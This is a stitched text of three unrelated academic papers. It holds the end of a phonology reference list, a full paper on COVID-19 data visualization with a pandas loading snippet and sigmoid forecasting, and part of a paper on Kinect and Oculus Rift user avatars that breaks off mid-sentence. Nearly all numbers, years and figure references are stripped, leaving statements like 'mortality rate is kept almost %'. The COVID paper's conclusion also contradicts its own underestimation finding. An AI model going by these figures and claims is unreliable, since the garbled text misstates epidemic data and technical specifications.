replacement rules using a limited parallel corpus. in proceedings of the first workshop on algorithms and resources for modelling of dialects and language varieties, dialects ’ , pages – . association for computational linguis- tics. mans hulden. . 
finite-state machine construction methods and algorithms for phonology and morphol- ogy. ph.d. thesis, university of arizona. adam jardine. . tone is (computationally) differ- ent. unpublished manuscript, university of delaware. c. douglas johnson. . formal aspects of phonolog- ical description. the hague, mouton. brian d. joseph and irene philippaki-warburton. . modern greek. croom helm, wolfeboro, nh. ronald m. kaplan and martin kay. . regular mod- els of phonological rule systems. computational lin- guistics, : – . huan luo. . long-distance consonant harmony and subsequentiality. unpublished manuscript, university of delaware. robert mcnaughton and seymour a. papert. . counter-free automata. mit press. mehryar mohri. . finite-state transducers in lan- guage and speech processing. computational linguis- tics, : – . josé oncina and pedro garcı́a. . inductive learning of subsequential functions. technical report dsic ii- , university politécnia de valencia. josé oncina and miguel a. varò. . using do- main information during the learning of a subsequen- tial transducer. lecture notes in computer science - lecture notes in artificial intelligence, pages – . josé oncina, pedro garcı́a, and enrique vidal. . learning subsequential transducers for pattern recog- nition interpretation tasks. ieee transactions on pat- tern analysis and machine intelligence, ( ): – . amanda payne. . dissimilation as a subsequen- tial process. unpublished manuscript, university of delaware. alan prince and paul smolensky. . optimality theory: constraint interaction in generative gram- mar. technical report , rutgers university center for cognitive science. jason riggle. . non-local reduplication. in pro- ceedings of the th annual meeting of the north east- ern linguistic society. james rogers and geoffrey k. pullum. . aural pat- tern recognition experiments and the subregular hier- archy. journal of logic, language and information, : – . james rogers, jeffrey heinz, margaret fero, jeremy hurst, dakotah lambert, and sean wibel. . cog- nitive and sub-regular complexity. in glyn morrill and mark-jan nederhof, editors, formal grammar, lec- ture notes in computer science, volume , pages – . springer. sharon rose and rachel walker. . a typology of consonant agreement as correspondence. language, : – . keiichiro suzuki. . a typological investigation of dissimilation. ph.d. thesis, university of arizona. natasha warner, allard jongman, anne cutler, and doris mücke. . the phonological status of dutch epenthetic schwa. phonology, : – . sample paper title international journal of advanced network, monitoring and controls volume , no. , doi: . /ijanmc- - data visualization analysis of covid- epidemic situation yang tao nanchang institute of science and technology nanchang, china e-mail: taoyangxp@ .com abstract— novel coronavirus (covid- ) has brought immeasurable losses and huge impact to the world. for human health, many centres for disease control(cdc) in various countries around the world are actively collecting data and doing a good job in virus prevention and control. the real-time release of the epidemic situation, with analysis and prediction, is a very effective method to combat the epidemic. by studying the situation of epidemic data, based on jupyter notebook, this paper gives the visual analysis process of covid- epidemic data, and carries out specific analysis and implementation. and then it estimates the coronavirus converges roughly using sigmoid fitting. 
although the sigmoid fitting tends to underestimate the curve, the actual values tend to exceed the sigmoid curve estimation. the proposed data visualization analysis method could effectively display the status of the covid- epidemic situation, hoping to help control and reduce the impact of the covid- epidemic. keywords—covid- ; data visualization; situation dashboard; jupyter notebook; epidemic situation i. introduction novel coronavirus ( -ncov) is a virus (more specifically, a coronavirus) identified as the cause of an outbreak of respiratory illness. a growing number of patient reports have indicated that person-to-person spread is occurring. at this time, it is unclear how easily or sustainably this virus spreads between people. therefore, it is very important to visually analyse the covid- epidemic situation, which helps to control the impact of the covid- epidemic and reduce losses. ii. load data the dataset has daily-level information on the number of affected cases, deaths and recoveries from the novel coronavirus. this is time-series data, so the number of cases on any given day is the cumulative number. the data is available from jan, . we can download the latest data from the johns hopkins university github repository: https://github.com/cssegisanddata/covid- [ ]. we can also grab data from various centres for disease control [ - ]. the data folder contains the previously posted dashboard case reports from jan to feb , for the coronavirus covid- (formerly known as -ncov). we will refer to the data provided in the new folder, entitled "csse_covid_ _data". moving forward they will be updating daily case reports into this new folder. additionally, the previously uploaded data from jan to feb , is also included in the new folder, and it has been cleaned and re-formatted to address inconsistencies in the time zone and update frequency that resulted during the transition from manual updates to automated updates (which took place on feb , ). the new folder now includes one case report per day, from the same time of day. this will be the standard moving forward (as of feb , ). that is the data we will load for visualization analysis. the main file in this dataset is covid_ _data.csv and the detailed descriptions of its columns are below:
- sno - serial number
- observationdate - date of the observation in mm/dd/yyyy
- province/state - province or state of the observation (may be empty when missing)
- country/region - country of observation
- last update - time in utc at which the row is updated for the given province or country (not standardised, so please clean it before use)
- confirmed - cumulative number of confirmed cases up to that date
- deaths - cumulative number of deaths up to that date
- recovered - cumulative number of recovered cases up to that date
we will convert observationdate and last update to datetime since they are currently read as object. iii. visualization analysis for the purpose of data visualization, we mainly use the python-based tools jupyter notebook [ ] and plotly [ ]. the jupyter notebook is an open-source web application that allows you to create and share documents that contain live code, equations, visualizations and narrative text. uses include data cleaning and transformation, numerical simulation, statistical modeling, data visualization, machine learning, and much more.
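as a concrete illustration of this loading and preprocessing step, the sketch below reads the daily-level csv described above with pandas, converts the date columns to datetime, and aggregates a worldwide trend with plotly. the file path and the exact column capitalization are assumptions to be adjusted to the downloaded copy of the dataset; this is a minimal sketch, not the full notebook behind the figures.

```python
# Minimal sketch: load the daily-level CSV described above, parse dates, and build a
# worldwide trend. Path and column capitalization are assumptions; adjust to your copy.
import pandas as pd
import plotly.express as px

df = pd.read_csv("path/to/covid_daily_data.csv")  # the daily-level file described above

# ObservationDate and Last Update are read as object (strings); convert to datetime.
df["ObservationDate"] = pd.to_datetime(df["ObservationDate"])
df["Last Update"] = pd.to_datetime(df["Last Update"], errors="coerce")

# Confirmed/Deaths/Recovered are cumulative per province and day, so summing all rows
# of a given date yields the worldwide cumulative numbers for that date.
world = (df.groupby("ObservationDate")[["Confirmed", "Deaths", "Recovered"]]
           .sum()
           .reset_index())
world["MortalityRate"] = world["Deaths"] / world["Confirmed"]

# Interactive plotly figure of the worldwide confirmed/death curves.
fig = px.line(world, x="ObservationDate", y=["Confirmed", "Deaths"],
              title="Worldwide confirmed/death cases over time")
fig.show()
```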
the plotly visualization is heavy used in this kernel so that we can interactively see the figure, map etc. as a side effect, it might take a little bit more time to initialize the python environment and to load the kernel. then grab data from the internet and load the data. a. worldwide trend when we see the confirmed cases in worldwide, it just look like exponential growth curve. the number is increasing very rapidly especially recently. as a further matter, daily new confirmed cases started not increasing from april . after that, flat trend continues so far, as shown in figure . figure . worldwide confirmed/death cases over time moreover, when we check the growth in log-scale below figure, we can see that the speed of confirmed cases growth rate slightly increases when compared with the beginning of march and end of march. in spite of the lockdown policy in europe or us, the number is still increasing rapidly, as shown in figure . figure . worldwide confirmed/death cases over time (log scale) it looks like fatalities curve is just shifted the confirmed curve to below in log-scale, which means mortality rate is almost constant. we see that mortality rate is kept almost %, however it is slightly increasing gradually to go over % at the end of april. europe & us has more seriously infected by coronavirus recently, and mortality rate is high in these regions, as shown in figure . it might be because when too many people get coronavirus, the country cannot provide enough medical treatment. figure . worldwide mortality rate over time b. country-wise growth there are countries in the dataset. how's the distribution of number of confirmed cases by country? it is difficult to see all countries so let's check top countries as shown in figure . international journal of advanced network, monitoring and controls volume , no. , figure . confirmed cases/deaths on - - now us, italy and spain has more confirmed cases than china, and we can see many europe countries in the top. korea also appears in relatively top despite of its population, this is because korea executes inspection check aggressively. let's check these major country's growth by date. as we can see, coronavirus hit china at first but its trend is slowing down in march which is good news. bad news is nd wave comes to europe (italy, spain, germany, france, uk) at march. but more sadly rd wave now comes to us, whose growth rate is much faster than china, or even europe. its main spread starts from middle of march and its speed is faster than italy. now us seems to be in the most serious situation in terms of both total number and spread speed. now let’s see the confirmed cases for the top countries, as shown in figure . figure . confirmed cases for top country as of - - in terms of number of fatalities, europe & us are serious situation now, as shown in figure . many countries have more fatalities than china now, including us, italy, spain, france, uk, iran belgium, germany, brazil, netherlands. us's spread speed is the fastest, us's fatality cases become top on apr th. figure . fatalities for top country as of - - now let's see mortality rate by country, as shown in figure . italy is the most serious situation, whose mortality rate is over % as of / / .we can also find countries from all over the world when we see top mortality rate countries, as shown in figure . iran/iraq from middle east, philippines & indonesia from tropical areas. spain, netherlands, france, and uk form europe etc. 
it shows this coronavirus is really worldwide pandemic. the countries whose mortality rate is low are shown in figure . by investigating the difference between above & below countries, we might be able to figure out what is the cause which leads death. be careful that there may be a case that these country's mortality rate is low due to these country does not report/measure fatality cases properly. figure . mortality rate high: top countries on - - international journal of advanced network, monitoring and controls volume , no. , figure . mortality rate high: top countries on - - let's see number of confirmed cases on map. again we can see europe, us, middle east (turkey, iran) and asia (china, korea) are red, as shown in figure . figure . countries with confirmed cases on - - the number of fatalities on map is shown as figure and the mortality rate map is shown as figure . when we see mortality rate on map, we see europe (especially italy) is high. also we notice middle east (iran, iraq) is high. when we see tropical area, i wonder why philippines and indonesia are high while other countries (malaysia, thai, vietnam, as well as australia) are low. for asian region, korea's mortality rate is lower than china or japan, i guess this is due to the fact that number of inspection is quite many in korea[ - ]. from the mortality rate map, it seems that mortality rate is especially high in europe region, compared to us or asia. figure . countries with fatalities on - - figure . countries with mortality rate on - - why mortality rate is different among country? what kind of hint is hidden in this map? especially mortality rate is high in europe and us, is there some reasons? there is one interesting hypothesis that bcg vaccination[ ]. c. daily new confirmed cases trend let’s see the daily new cases trend as shown in figure . figure . daily new confirmed cases worldwide international journal of advanced network, monitoring and controls volume , no. , we find from the figure :  china has finished its peak at feb , new confirmed cases are surpressed now.  europe&us spread starts on mid of march, after china slows down.  as effect of lock down policy in europe (italy, spain, germany, france) now comes on the figure, the number of new cases are not so increasing rapidly at the end of march.  current us new confirmed cases are the worst speed, recording worst speed at more than k people/day at peak. daily new confirmed cases start to decrease from april or april .  after that we can see a weekly trend that the confirmed cases becomes small on monday. i think this is because people don't (or cannot) get medical care on sunday so its reporting number is low on sunday or monday. d. zoom up to us as we can see, the spread is fastest in us now, at the end of march. let's see in detail what is going on in us. when we see inside of the us, we can see only new york, and its neighbour new jersey dominates its spread and are in serious situation. the number of new york confirmed cases is over k, while other states are less than about k confirmed cases, as shown in figure . figure . confirmed cases in us on - - mortality rate in new york seems not high, around % for now, as shown in figure . figure . mortality rate in us on - - all state is us got affected from middle of march, and now growing exponentially. in new york, less than k people are confirmed on march , but more than k people are confirmed on march . times explosion in weeks! the confirmed cases by state in us is show in figure . figure . 
confirmed cases by state in us, as of - - e. zoom up to europe when we look into europe, its northern & eastern areas are in a relatively better situation compared to the eastern & southern areas. the map of european countries with confirmed cases is shown in figure and figure . figure . european countries with confirmed cases, as of - - figure . confirmed cases by country in europe, as of - - italy, spain, germany, france and the uk in particular are in a more serious situation. the number of confirmed cases is rapidly increasing in russia now (as of may ); russia is now in a potentially very dangerous situation. when we check daily new cases in europe (as shown in figure ), we notice:
- uk and russia daily growth are higher than italy's now. these countries are potentially more dangerous now.
- italy's new cases have not been increasing since march , maybe because the lock-down policy has started working.
figure . daily new confirmed cases by country in europe f. zoom up to asia in asia, china & iran have many confirmed cases, followed by south korea & turkey. asian countries with confirmed cases are shown in figure . figure . confirmed cases by country in asia, as of - - the coronavirus hit asia in an early phase; how is the situation now? china & korea are already in a decreasing phase. unlike china or korea, daily new confirmed cases kept increasing in march and april, especially in iran and japan. but the number has started to decrease in these countries as well, as shown in figure . figure . daily new confirmed cases in asia, as of - - iv. estimation of course everyone is wondering when the coronavirus converges. let's estimate it roughly using sigmoid fitting. we referenced two kernels [ - ] for the original ideas. the fitting result is shown in figure . figure . sigmoid fitting with all latest data if we believe the above curve, the number of confirmed cases is slowing down now and it will be converging around the beginning of may in most countries. it might take until the beginning of june in the us. let's try validation by excluding the last days of data, as shown in figure . figure . sigmoid fitting without last days of data we now notice that sigmoid fitting tends to underestimate the curve, and the actual values tend to exceed the sigmoid curve estimation. therefore, one needs to be careful when reading sigmoid curve fitting results; the actual situation is likely to be worse than the previous figure trained with all data. v. conclusion based on data available on may , the paper showed the visualization of the covid- epidemic situation, including the worldwide trend, country-wise growth, and so on. then it estimated roughly when the coronavirus converges using sigmoid fitting. the model's estimates and predictions closely match reported confirmed cases. therefore the proposed data visualization analysis method could effectively display the status of the covid- epidemic situation, hoping to help control and reduce the impact of the covid- epidemic. the next steps include applying the method to global covid- death data in smaller regions, such as provinces. the method of visualization analysis could also be used to evaluate population mortality and the spread of other diseases. acknowledgments the authors wish to thank corochann, who is an engineer at preferred networks in tokyo. this work was supported in part by the ph.d.
research initiation fund of nanchang institute of science and technology with the project (no. ngrczx- - ) and supported by robot and intelligent system research centre of artificial intelligence college of nanchang institute of science and technology (no.ngyzy- - ). international journal of advanced network, monitoring and controls volume , no. , refe ren ces [ ] https://www.kaggle.com/benhamner/covid- -forecasting-challenges- week- -data-prep. [ ] china cdc (ccdc): http://weekly.chinacdc.cn/news/trackingtheepidemic.htm [ ] taiwan cdc: https://sites.google.com/cdc.gov.tw/ ncov/taiwan?authuser= [ ] us cdc: https://www.cdc.gov/coronavirus/ -ncov/index.html [ ] government of canada: https://www.canada.ca/en/public- health/services/diseases/coronavirus.html [ ] european centre for disease prevention and control (ecdc): https://www.ecdc.europa.eu/en/geographical-distribution- -ncov- cases [ ] jupyter notebook - project jupyter | home. https://jupyter.org/ [ ] plotly: the front-end for ml and data science models. https://plotly.com/ [ ] south korea launches 'drive-thru' coronavirus testing facilities as demand soars. https://www.japantimes.co.jp/news/ / / /asia- pacific/science-health-asia-pacific/south-korea-drive-thru- coronavirus/#. xoamw j rpy [ ] coronavirus: why japan tested so few people. https://asia.nikkei.com/spotlight/coronavirus/coronavirus-why- japan-tested-so-few-people [ ] if i were north american/west european/australian, i will take bcg vaccination now against the novel coronavirus pandemic. https://www.jsatonotes.com/ / /if-i-were-north- americaneuropeanaustral.html [ ] sigmoid per country. https://www.kaggle.com/group /sigmoid-per- country-no-leakage [ ] covid- growth rates per country. https://www.kaggle.com/mikestubna/covid- -growth-rates-per- country. submitted february accepted july published july corresponding author renan c. moioli, moioli@isd.org.br academic editor alex james additional information and declarations can be found on page doi . /peerj-cs. copyright macedo silva and moioli distributed under creative commons cc-by . open access a method for creating interactive, user- resembling avatars igor macedo silva , and renan c. moioli centro de tecnologia, universidade federal do rio grande do norte, natal, rio grande do norte, brazil graduate program in neuroengineering, edmond and lily safra international institute of neuroscience, santos dumont institute, macaiba, rio grande do norte, brazil abstract virtual reality (vr) applications have disseminated throughout several fields, with a special quest for immersion. the avatar is one of the key constituents of immersive applications, and avatar resemblance can provoke diverse emotional responses from the user. yet a lot a virtual reality systems struggle to implement real life-like avatars. in this work, we propose a novel method for creating interactive, user-resembling avatars using available commercial hardware and software. avatar visualization is possible with a point-cloud or a contiguous polygon surface, and avatar interactions with the virtual scenario happens through a body joint-approximation for contact. in addition, the implementation could be easily extended to other systems and its modular architecture admits improvement both on visualization and physical interactions. the code is under apache license . and is freely available as supplemental information in this article. 
subjects human-computer interaction, emerging technologies keywords virtual reality, immersion, oculus rift, kinect, avatar embodiment introduction virtual reality (vr) is understood as an advanced human–computer user interface that mimics a realistic environment by linking human perception systems with a virtual environment (zheng, chan & gibson, ). the key point about vr is its attempt to provide seamless interaction with a computational environment, thus understanding human intent and creating a reasonable response from the virtual environment. the gaming industry has historically driven developments on vr (mills, ), contributing to lowering the cost of technology. there has been a growing demand for techniques or devices that improve the user’s ability to feel inside a game, surrounded by elements that promote the desired gameplay. to achieve that, the industry has turned to motion tracking devices and immersive d graphics, including head mounted displays (hmds), such as oculus rift, htc vive, and hololens, and motion tracking technologies, such as kinect, wii remote, leap motion, and virtuix omni vr treadmill. this recent surge of affordable vr devices expanded the number of vr applications. to mention but a few examples beyond the gaming scene, vr is now widely used in medical applications for physical rehabilitation (paolini et al., ; baldominos, saez & del pozo, ; draganov & boumbarov, ; morel et al., ; donati et al., ; shokur et al., ), exposure therapy for phobias and post-traumatic stress (notzon et al., ; how to cite this article macedo silva and moioli ( ), a method for creating interactive, user-resembling avatars. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:moioli@isd.org.br https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. #supp- http://dx.doi.org/ . /peerj-cs. cuperus et al., ), treatment for addiction (park et al., ) and even autism (didehbani et al., ). other fields such as architecture and urban planning (portman, natapov & fisher-gewirtzman, ; luigi et al., ) and education (abulrub, attridge & williams, ) also benefit from the technology. however, as advanced as those technologies are, there are a few limitations to each of them. the technologies mentioned above, such as the hmds and motion tracking devices, tackle a single piece of the virtual reality interaction problem. the hmds give visual support for the simulation while motion tracking devices provide means for our body to interact with the virtual world. on one hand, most hmds deal exclusively with visual perceptions and head movement while completely ignoring any other body movement. as a result, hmds applications are usually static and display static, generic avatars, frustrating any kind of user interaction other than through vision and head movement. motion tracking devices, on the other hand, allow for whole-body user interaction but limit the immersion experience because they do not take into account the user’s visual field. therefore, users are limited on how they can interact with the system, depending on which device they use. a possible solution is to use the capabilities of both devices in an integrated hardware- software approach. 
ideally, this system would be able to track body movements, record user images and present them inside the head mounted display, reacting to what the user is looking at and how the user is moving. a key issue is that there is scarce information on how to integrate and utilize both technologies in one whole system. an example is shown by woodard & sukittanon ( ), explaining how both oculus rift and kinect could be used to create virtual interactive walkthroughs for building projects. however, they do not use the kinect’s full capabilities, such as body-frame detection and rgba frames to recreate the avatar and interact with the virtual environment. in accordance with growing evidence of the importance of avatar representation and interaction to obtain an improved immersion experience in virtual reality, this work presents a software approach to integrate a motion tracking device with depth sensing capabilities (kinect v ) to a head mounted display (oculus rift dk ) in order to improve the interaction and immersion perception in vr systems. this software uses the sdks of both devices, along with opengl for rendering graphics and bullet physics for physic simulations, to create a highly resembling d representation of the user in the virtual space. this d representation, henceforth referred to as avatar, is highly sensitive to the user’s movements and can interact with virtual objects in the virtual environment. the main result is a demo project that incorporates all of the necessary code to compile a neutral virtual environment with objects and the avatar. the code is under apache license . and is freely available as supplementary material. we believe that this work contributes to easily integrate hmds and motion tracking devices to expand real time immersive experience interaction. macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. background and related work virtual reality technologies among the devices used on vr research, the oculus rift and the kinect are probably the most widely known products. both devices tackle specific problems underlying human– computer interfaces and, by the time of their launch, they brought innovative solutions to the common consumer. nowadays, there are a few other solutions that aim at offering the same range of features and usability of oculus rift and kinect. regarding depth cameras, such as the kinect, we can cite the asus xtion, depthsense camera, and leapmotion as alternatives. although leapmotion is the most accurate in comparison to the others, with spatial resolution of about mm (weichert et al., ), it has the shortest range of action of . m (leapmotion, ). another device called the depthsense camera is able to provide fps and depth ranging from cm to m, but its frames per second throughput diminishes quickly as the depth range increases, going from . m at fps to m at fps (depthsense, ). the asus xtion has a similar precision to the kinect v , as shown in gonzalez-jorge et al. ( ), and its most recent version is comparable to the kinect v in terms of technical specifications (asus, ; microsoft, b). yet the kinect has a much broader community and support from microsoft for its official sdk. this reflects specially in the number of applications and publications made with kinect or asus xtion. thus, considering the specifications shown here, we choose to use in our system the kinect v as the main interface for depth sensing. 
the first to appear on the market was the kinect v , in , with the official software development kit (sdk) released later on in (microsoft, a). in , a second iteration of the kinect was released (microsoft, b). the kinect v has a , p color camera operating at hz in good light conditions, a × depth sensing camera operating at hz and × field of view, sensing from . to . m, and active infrared capabilities with the same resolution. with its pose tracking capabilities and affordability, the kinect quickly made its way to the research scene. regarding accuracy for motion tracking, the kinect is adequate for most scientific purposes, including medical studies on posture and rehabilitation (clark et al., ; clark et al., ; zhao et al., ). in particular, otte et al. ( ) have shown that the kinect v can derive clinical motion parameters with comparable performance to that obtained by a gold standard motion capture system. as for virtual reality headset, the oculus rift was for a period the only option available. but, soon enough, companies started to unveil similar products and nowadays the oculus rift has a few competitors. some of them have yet to be commercially launched, such as the fove and star vr. two commercially available platforms are the playstation vr and the htc vive. both have very similar hardware specifications to the oculus rift (playstation, ; digitaltrends, ). the main difference is the price range: while the htc vive is priced at u$ , the playstation vr costs u$ and the oculus rift is sold for u$ . yet, the oculus rift has been in development since and has created a solid developer macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. community. for this reason, the oculus rift is a sensible choice both in terms of hardware specifications and development support. the first release of the oculus rift, named dk , was for supporters only and occurred in . the second iteration was released in as dk , and the first commercial version was released in . the oculus rift dk improved the first iteration with a screen resolution of × , p per eye, a refresh rate of hz and persistence of about to ms. in addition, the head-mounted display has sensors to detect head motion both internally and externally. the immersion requirement if we understand vr as a human–computer interface, there are two core ideas that measure the quality of the interface: immersion and interactivity (zheng, chan & gibson, ). immersion occurs when the user is able to block out distractions, usually any perceptions from the real world, and then focus on the virtual elements with which one wants to work. interactivity is the possibility to interact with the events of the virtual world. both ideas are connected and interdependent. for example, if a vr system has low interactivity, the immersion factor might be affected. on the other hand, if the system is not immersive, the interactivity will be less engaging. the immersion requirement dictates the overall experience with a vr system. a previous study developed by alshaer, regenbrecht & o’hare ( ) identified three immersion factors which affect perception and the sense of self-presence in a vr system: the display type (head mounted display (hmd) or monitor), field of view (fov) and the user’s avatar. 
a poor tuning of these factors can cause discomfort and a sense that the virtual actions or events are absurd and do not reflect reality among users, eventually disrupting the immersive experience and causing a poor vr experience as a whole. avatar embodiment in vr systems, the avatar consists of a visual representation of the user, a construction made to visually communicate aspects of one’s identity and how he or she wants to be perceived. using the avatar, the user is able to give meaning to their virtual self and that correlates with the sense of presence (de frança & soares, ). the concept of presence, as mentioned by de frança & soares ( ), allows a discussion about self representations at three different, yet interdependent levels: body, affection and identity. focusing on those three levels is specially important in vr applications in order to improve the user’s performance in the system. in the discussion section, we present how the developed system exploits those levels in order to create sense of embodiment. this connection between avatar and physical self has been investigated. wrzesien et al. ( ) focused on how teenagers can learn to regulate their emotions by watching physically similar avatars deal with frustration. the authors concluded that when the avatar is modeled to resemble the human user, the intensity of the emotional states, emotional valence and arousal for each participant has a much greater level than that obtained when the avatar is neutral. this confirms that the similarity between the avatar and the user may cause a significant psychological response. macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. another study (fox & bailenson, ) was concerned about how this similarity might modify behavior. after dividing the participants in groups with a virtual self representation or with another person representation, they were exposed to voluntary sessions of exercises with rewards and punishments. the research concluded that the group with virtual self representation exercised significantly more regardless of reward or punishment. both studies demonstrate that the avatar influences the overall experience on vr and expands this experience to the user in the physical world. similar results were obtained in a study by lugrin, landeck & latoschik ( ), confirming that behavior and performance are indeed altered by avatar representation. applications the avatar is a core concept for immersion in vr (alshaer, regenbrecht & o’hare, ), thus most vr applications benefit from improved user-resemblance and interactivity with the virtual environment. in the medical field, vr is broadly used for rehabilitation treatments. for example, the systems presented by rudinskiy et al. ( ), donati et al. ( ) or shokur et al. ( ) use vr with an avatar visualization for gait rehabilitation. in this case, an improved avatar visualization would help generating a better sense of immersion and could possibly help with the treatment. this improvement is thought to come from an increased engagement in the rehabilitation activities, which provokes intense and life-like emotions and behaviors. this motivates the user to perform the activities. another field that benefits from this technology is social studies. in a controlled environment, such as a virtual environment, it is possible to reproduce a variety of social phenomenons. a highly user-resembling avatar may improve the immersion experience and mimic social interactions. 
for example, stavroulia et al. ( ) creates a simulated environment to reproduce bullying occurrences inside a classroom. considering the benefits of an avatar representation, it is expected that such a simulation would benefit from the avatar generation method described here by improving on the overall experience of the system. as a last example, tourism or even architecture could benefit from this technology by giving the user an immersive experience in which they could feel immersed. it is probably easier to create a sense of space and dimensions if you can refer to your own body as a reference. in this sense, interior design professionals and students could use our method to showcase a project and literally place the observer inside the space to visually comprehend each detail of the project. in tourism, virtual environments can replicate interesting places and allow the user to see and even interact with elements through its own avatar. materials & methods hardware and development environment preparation hardware integration from different manufacturers is a key point in vr applications and may increase software development complexity. the oculus rift dk was chosen for visualization and the kinect for windows v was chosen for motion tracking, color and depth sensing. this choice considered that both macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. this is the highest openmp version available for visual c++ in visual studio . table compatibility requirements for development environment and software usage. system rel- evant information: windows pro; amd radeon hd series; intel(r) core(tm) i - cpu @ . ghz; gb ram. identification compatibility requirement description c the kinect for windows v requires windows or higher. c the kinect for windows v requires kinect for windows sdk . . c the oculus rift dk on windows requires oculus runtime and sdk . or higher. c the oculus runtime . running alongside an amd radeon hd re- quires amd catalyst . . beta driver* notes. *later versions of the new crimson driver were found to be incompatible with oculus runtime . . devices were the latest iteration available at their respective product lines by the time this study was developed and, thus, had significant improvements over previous iterations. specifically, the oculus rift dk has a higher screen resolution and better head movement tracking than the dk , which contributes to an improved and seamless visual interaction with the virtual environment. this choice of hardware requires a specific setup of the development environment and later usage of the software because there are potential compatibility issues with operational system, hardware runtime routines, graphic card drivers and available sdks for each device. a list of requirements for compatibility is available in table along with relevant information from the system. when multiple versions of software were possible, we opted for the most recent. the language of development is c++ for it was the only language officially supported by both oculus rift and kinect sdks. both sdks can be obtained through their respective product websites, along with correct versions of drivers and runtimes (shown in table ) which are necessary for hardware functioning. in addition to sdks, drivers and runtimes, we used a few libraries: the opengl library is already integrated to the oculus sdk and sample programs; the bullet engine . . 
is responsible for physics simulation in the virtual environment, specially collisions between the avatar and virtual objects; and the openmp . is used for parallelization in the handle classes for each sdk. the code was implemented and compiled with visual studio . software requirements the requirements listed in table guided software development. other functions (only feasible for the chosen hardware) were implemented along the development in order to provide more interaction options to the user and will be described later. regarding requirement r . , the decision to create the avatar based on real time data is crucial to the final objective of the software, which is to create a deeper sense of immersion in the user. this requirement should enforce the avatar to morph and move accordingly to each user in real time and provide plausible responses to each of their actions in the virtual environment. macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the camera space is a three-dimensional space that represents the position of each point in the real world ‘‘space’’. table basic requirements for the development of the software. identification requirement description r the software shall create a d recreation of the user—known as the avatar. r . the avatar shall be defined by real time data from the depth and color sensors. r . the avatar shall be displayed in a d virtual environment in a hmd. r the software shall offer the option to visualize in first-person perspective or third-person perspective. r the software shall render at an acceptable frame rate (minimum fps). r the software shall provide simulated physical interaction between the avatar and the environment. r the software shall provide a keyboard interface to select which user has the oculus rift point of view, when first-person perspective is selected. r the software shall provide a keyboard interface to adjust the camera position in order to accommodate and match the user virtual visualization with the real world. implementation of core functionality the development of the main idea of the software, described by requirement r . in table , involves the concept of a point cloud (linsen, ; rusu & cousins, ). this element is composed by a group of points fully defined by their location in a d space with magnitude on each of the three space dimensions. such property allows the programmer to plot this point cloud in a d virtual environment and visualize the surface from which the point cloud was acquired in the first place. when visualizing the point cloud, it is possible to perceive the dots as a ‘‘cloud’’ floating in the virtual space, hence the name. if not computationally generated, one can acquire a point cloud from the real world with a depth sensor, laser scanner data or photogrammetric image measurements (remondino, ). for this purpose, this paper uses the kinect v , which provides features beyond depth sensing that will be discussed later. the rationale is that it is possible to create a polygon surface from the point cloud of one user. therefore, the first step was to acquire the point cloud and plot it in the virtual environment, with the aid of the opengl library. using the kinect sdk, we developed a handle class to request data from the kinect and translate it to an opengl compatible format. the kinect v can simultaneously detect and differentiate up to six users, also called bodies. 
in addition, the kinect provides five types of pertinent data for this project: . color frame: a rgb frame with , × , p. . depth frame: a depth frame with × p. . body frame: a × frame where each element contains the index of the detected body for the relative pixel in the depth frame. . joint vertices: a float array containing information for the camera space localization of each joint of each body. . body array: indicates which of the six possible bodies the kinect is currently tracking the acquisition of each type of data is executed by a function inside the kinect handler class and parallelized with the openmp library for optimization. figure shows the function getcolordepthandbody() called from the handle class, which returns the frame macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. main.cpp frame rendering roomscene->render(...); win _glapputil.cpp struct scene dotstest->updatepoints(); dotstest->display(...); update avatar points from kinect struct mydots kinect->getcolordepthandbody(...); get data from kinect handler kinect->m_pcoordinatemapper-> mapdepthpointtocolorspace(...); kinect->m_pcoordinatemapper-> mapdepthpointtocameraspace(...); convert data to virtual space glbufferdata(...); upload do opengl bufferdraw avatar graphics and update collision objects rigidbodyarray[...]-> getmotionstate()->getworldtransform(...); rigidbodyarray[...]-> getmotionstate()->setworldtransform(...); update joints' positions gldrawarrays(...); draw to opengl frame boxmodels[i]->boxrigidbody-> getmotionstate()->getworldtransform(...); update positions and draw graphics from other models boxmodels[i]->render(...); (...) figure frame rendering cycle: structures and functions. figure dataflow and processing. data from the kinect. in fig. , it it possible to observe this same process with a higher level of abstraction, where the handle class acquires the kinect frame data and returns it to the next structure for processing. next, the depth information from the depth frame is mapped to camera space in order to create the aforementioned point cloud, as shown in fig. . this means that each pixel in the depth frame is mapped to a d virtual representation of the real world, so that the software is able to plot a visualization for the point cloud. alongside, it is also needed to map the depth frame to the color information from the color frame so that the software is able to associate rgb color to each point in the depth frame and render an improved visualization in the oculus rift. the kinect sdk provides both mapping functions and they are used accordingly in the software. the function to map depth frame to camera macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. space is declared as mapdepthpointtocameraspace in the icoordinatemapper struct. it receives a depth space point and a depth value and returns by reference the camera space point. the function to map the depth frame points to color frame points is declared as mapdepthpointtocolorspace. similarly, it receives a depth space point and a depth value and returns by reference a color space point. with those two conversions, the software is able to place each point in a d space and associate rgb color to each point, creating the point cloud. those function are presented in the frame rendering cycle, in fig. the next processing stage in fig. 
